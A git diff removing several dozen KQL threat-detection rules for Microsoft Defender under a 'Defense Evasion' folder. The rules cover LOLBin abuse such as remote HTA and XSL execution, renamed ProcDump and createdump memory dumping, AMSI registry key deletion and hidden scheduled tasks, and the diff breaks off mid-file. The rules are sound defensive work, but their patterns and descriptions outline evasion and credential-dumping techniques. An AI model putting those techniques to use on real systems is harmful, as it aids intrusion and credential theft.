deleted file mode 100644
index 4b8796c3..00000000
--- a/Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/13
-// Level: high
-// Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisablementCommand" or ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisableme"
\ No newline at end of file
diff --git a/Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql b/Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql
deleted file mode 100644
index 5e3e031a..00000000
--- a/Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/19
-// Level: medium
-// Description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe") or ProcessVersionInfoProductName =~ "Remote Utilities") and (not((FolderPath startswith "C:\\Program Files\\Remote Utilities" or FolderPath startswith "C:\\Program Files (x86)\\Remote Utilities")))
\ No newline at end of file
diff --git a/Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql b/Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql
deleted file mode 100644
index 86bc8bbe..00000000
--- a/Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/07
-// Level: medium
-// Description: Detects an attempt to execute code or create service on remote host via winrm.vbs.
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where (ProcessCommandLine contains "winrm" and ProcessCommandLine contains "invoke Create wmicimv2/Win32_" and ProcessCommandLine contains "-r:http") and (FolderPath endswith "\\cscript.exe" or ProcessVersionInfoOriginalFileName =~ "cscript.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql b/Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql
deleted file mode 100644
index 9b77679a..00000000
--- a/Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
-
-// Tags: attack.defense_evasion, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -v " or ProcessCommandLine contains " /v ") and (ProcessCommandLine contains " -l " or ProcessCommandLine contains " /l ") and ProcessCommandLine contains "\\\\")
\ No newline at end of file
diff --git a/Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql b/Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql
deleted file mode 100644
index ccf52622..00000000
--- a/Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: high
-// Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.
-// Tags: attack.defense_evasion, attack.t1220
-DeviceProcessEvents
-| where ProcessCommandLine contains "http" and FolderPath endswith "\\msxsl.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql b/Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql
deleted file mode 100644
index d0784cd7..00000000
--- a/Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/08
-// Level: high
-// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql b/Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql
deleted file mode 100644
index 990767da..00000000
--- a/Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/06/07
-// Level: high
-// Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "{2781761E-28E0-4109-99FE-B9D127C57AFE}" or RegistryKey endswith "{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}")
\ No newline at end of file
diff --git a/Defense Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql b/Defense Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql
deleted file mode 100644
index 0655e39c..00000000
--- a/Defense Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/26
-// Level: medium
-// Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
-// Tags: attack.defense_evasion, attack.t1562
-DeviceRegistryEvents
-| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree" and RegistryKey contains "Index")
\ No newline at end of file
diff --git a/Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql b/Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql
deleted file mode 100644
index e7a8dadc..00000000
--- a/Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sittikorn S
-// Date: 2022/04/15
-// Level: medium
-// Description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
-// Tags: attack.defense_evasion, attack.t1562
-DeviceRegistryEvents
-| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree" and RegistryKey contains "SD")
\ No newline at end of file
diff --git a/Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql b/Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql
deleted file mode 100644
index 3b5298d1..00000000
--- a/Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: Detects any deletion of entries in ".*\shell\open\command" registry keys.
-These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey endswith "\\shell\\open\\command") and (not(((InitiatingProcessFolderPath endswith "\\Dropbox.exe" and RegistryKey contains "\\Dropbox.") or (InitiatingProcessFolderPath endswith "\\Everything.exe" and RegistryKey contains "\\Everything.") or InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe" or (InitiatingProcessFolderPath endswith "\\installer.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Java\\" and RegistryKey contains "\\Classes\\WOW6432Node\\CLSID\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (InitiatingProcessFolderPath endswith "\\installer.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Opera\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Opera\\")) or (InitiatingProcessFolderPath contains "peazip" and RegistryKey contains "\\PeaZip.") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\Wireshark_uninstaller.exe" and RegistryKey contains
"\\wireshark-capture-file"))))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql b/Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql
deleted file mode 100644
index c887b9ee..00000000
--- a/Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali
-// Date: 2023/02/07
-// Level: medium
-// Description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessVersionInfoProductName contains "AutoHotkey" or ProcessVersionInfoFileDescription contains "AutoHotkey" or (ProcessVersionInfoOriginalFileName in~ ("AutoHotkey.exe", "AutoHotkey.rc"))) and (not(((FolderPath endswith "\\AutoHotkey.exe" or FolderPath endswith "\\AutoHotkey32.exe" or FolderPath endswith "\\AutoHotkey32_UIA.exe" or FolderPath endswith "\\AutoHotkey64.exe" or FolderPath endswith "\\AutoHotkey64_UIA.exe" or FolderPath endswith "\\AutoHotkeyA32.exe" or FolderPath endswith "\\AutoHotkeyA32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU32.exe" or FolderPath endswith "\\AutoHotkeyU32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU64.exe" or FolderPath endswith "\\AutoHotkeyU64_UIA.exe") or FolderPath contains "\\AutoHotkey")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_CURL.EXE_Execution.kql b/Defense Evasion/Renamed_CURL.EXE_Execution.kql
deleted file mode 100644
index 5fedd523..00000000
--- a/Defense Evasion/Renamed_CURL.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/09/11
-// Level: medium
-// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_CreateDump_Utility_Execution.kql b/Defense Evasion/Renamed_CreateDump_Utility_Execution.kql
deleted file mode 100644
index f1565826..00000000
--- a/Defense Evasion/Renamed_CreateDump_Utility_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/09/20
-// Level: high
-// Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " -u " and ProcessCommandLine contains " -f " and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains " --full " and ProcessCommandLine contains " --name " and ProcessCommandLine contains ".dmp")) or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR") and (not(FolderPath endswith "\\createdump.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_FTP.EXE_Execution.kql b/Defense Evasion/Renamed_FTP.EXE_Execution.kql
deleted file mode 100644
index a2a27522..00000000
--- a/Defense Evasion/Renamed_FTP.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Jusched.EXE_Execution.kql b/Defense Evasion/Renamed_Jusched.EXE_Execution.kql
deleted file mode 100644
index 059e77e2..00000000
--- a/Defense Evasion/Renamed_Jusched.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Swisscom
-// Date: 2019/06/04
-// Level: high
-// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group
-// Tags: attack.execution, attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Mavinject.EXE_Execution.kql b/Defense Evasion/Renamed_Mavinject.EXE_Execution.kql
deleted file mode 100644
index e67eb044..00000000
--- a/Defense Evasion/Renamed_Mavinject.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2022/12/05
-// Level: high
-// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_MegaSync_Execution.kql b/Defense Evasion/Renamed_MegaSync_Execution.kql
deleted file mode 100644
index b1b03fbb..00000000
--- a/Defense Evasion/Renamed_MegaSync_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sittikorn S
-// Date: 2021/06/22
-// Level: high
-// Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "megasync.exe" and (not(FolderPath endswith "\\megasync.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Msdt.EXE_Execution.kql b/Defense Evasion/Renamed_Msdt.EXE_Execution.kql
deleted file mode 100644
index a28480e4..00000000
--- a/Defense Evasion/Renamed_Msdt.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/06/03
-// Level: high
-// Description: Detects the execution of a renamed "Msdt.exe" binary
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "msdt.exe" and (not(FolderPath endswith "\\msdt.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_NirCmd.EXE_Execution.kql b/Defense Evasion/Renamed_NirCmd.EXE_Execution.kql
deleted file mode 100644
index fe83139c..00000000
--- a/Defense Evasion/Renamed_NirCmd.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2024/03/11
-// Level: high
-// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Office_Binary_Execution.kql b/Defense Evasion/Renamed_Office_Binary_Execution.kql
deleted file mode 100644
index 88a5736c..00000000
--- a/Defense Evasion/Renamed_Office_Binary_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/20
-// Level: high
-// Description: Detects the execution of a renamed office binary
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_PingCastle_Binary_Execution.kql b/Defense Evasion/Renamed_PingCastle_Binary_Execution.kql
deleted file mode 100644
index 98720000..00000000
--- a/Defense Evasion/Renamed_PingCastle_Binary_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2024/01/11
-// Level: high
-// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Plink_Execution.kql b/Defense Evasion/Renamed_Plink_Execution.kql
deleted file mode 100644
index 76dd4df8..00000000
--- a/Defense Evasion/Renamed_Plink_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/06
-// Level: high
-// Description: Detects the execution of a renamed version of the Plink binary
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "Plink" or (ProcessCommandLine contains " -l forward" and ProcessCommandLine contains " -P " and ProcessCommandLine contains " -R ")) and (not(FolderPath endswith "\\plink.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_ProcDump_Execution.kql b/Defense Evasion/Renamed_ProcDump_Execution.kql
deleted file mode 100644
index 09852431..00000000
--- a/Defense Evasion/Renamed_ProcDump_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/11/18
-// Level: high
-// Description: Detects the execution of a renamed ProcDump executable often used by attackers or malware
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "procdump" or ((ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma ") and (ProcessCommandLine contains " -accepteula " or ProcessCommandLine contains " /accepteula "))) and (not((FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql b/Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
deleted file mode 100644
index 6b0bdff3..00000000
--- a/Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/19
-// Level: medium
-// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
-// Tags: attack.defense_evasion, attack.collection, attack.command_and_control, attack.discovery, attack.s0592
-DeviceProcessEvents
-| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Vmnat.exe_Execution.kql b/Defense Evasion/Renamed_Vmnat.exe_Execution.kql
deleted file mode 100644
index 9e5bf562..00000000
--- a/Defense Evasion/Renamed_Vmnat.exe_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/09/09
-// Level: high
-// Description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "vmnat.exe" and (not(FolderPath endswith "vmnat.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql b/Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql
deleted file mode 100644
index b9cadb73..00000000
--- a/Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/22
-// Level: medium
-// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") and ProcessCommandLine contains ".rsp"
\ No newline at end of file
diff --git a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql b/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql
deleted file mode 100644
index 2611f7a6..00000000
--- a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2023/01/13
-// Level: high
-// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
-RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
-This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin"
\ No newline at end of file
diff --git a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql b/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql
deleted file mode 100644
index 0bf59ff5..00000000
--- a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2023/01/13
-// Level: high
-// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
-RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
-This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa\\" and ProcessCommandLine contains "DisableRestrictedAdmin"
\ No newline at end of file
diff --git a/Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql b/Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql
deleted file mode 100644
index a929c0d8..00000000
--- a/Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-// Tags: attack.defense_evasion, attack.t1553.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains ":\\Windows\\TEMP\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\") and (ProcessCommandLine contains "Import-Certificate" and ProcessCommandLine contains " -FilePath " and ProcessCommandLine contains "Cert:\\LocalMachine\\Root")
\ No newline at end of file
diff --git a/Defense Evasion/RunDLL32_Spawning_Explorer.kql b/Defense Evasion/RunDLL32_Spawning_Explorer.kql
deleted file mode 100644
index f0782750..00000000
--- a/Defense Evasion/RunDLL32_Spawning_Explorer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim, CD_ROM_
-// Date: 2022/04/27
-// Level: high
-// Description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not(InitiatingProcessCommandLine contains "\\shell32.dll,Control_RunDLL"))
\ No newline at end of file
diff --git a/Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql b/Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql
deleted file mode 100644
index ae35c612..00000000
--- a/Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Avneet Singh @v3t0_, oscd.community
-// Date: 2020/11/15
-// Level: medium
-// Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Active Setup\\Installed Components" and RegistryKey endswith "\\StubPath") and (not(((RegistryValueData contains "C:\\Program Files\\Google\\Chrome\\Application\\" and RegistryValueData contains "\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level") or ((RegistryValueData contains "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or RegistryValueData contains "C:\\Program Files\\Microsoft\\Edge\\Application\\") and RegistryValueData endswith "\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable"))))
\ No newline at end of file
diff --git a/Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql b/Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql
deleted file mode 100644
index 614c8ce9..00000000
--- a/Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)
-// Date: 2020/10/18
-// Level: low
-// Description: This rule detects the execution of Run Once task as configured in the registry
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/AlternateShellStartup" or ProcessCommandLine endswith "/r") and (FolderPath endswith "\\runonce.exe" or ProcessVersionInfoFileDescription =~ "Run Once Wrapper")
\ No newline at end of file
diff --git a/Defense Evasion/Run_PowerShell_Script_from_ADS.kql b/Defense Evasion/Run_PowerShell_Script_from_ADS.kql
deleted file mode 100644
index 0e8c75dc..00000000
--- a/Defense Evasion/Run_PowerShell_Script_from_ADS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
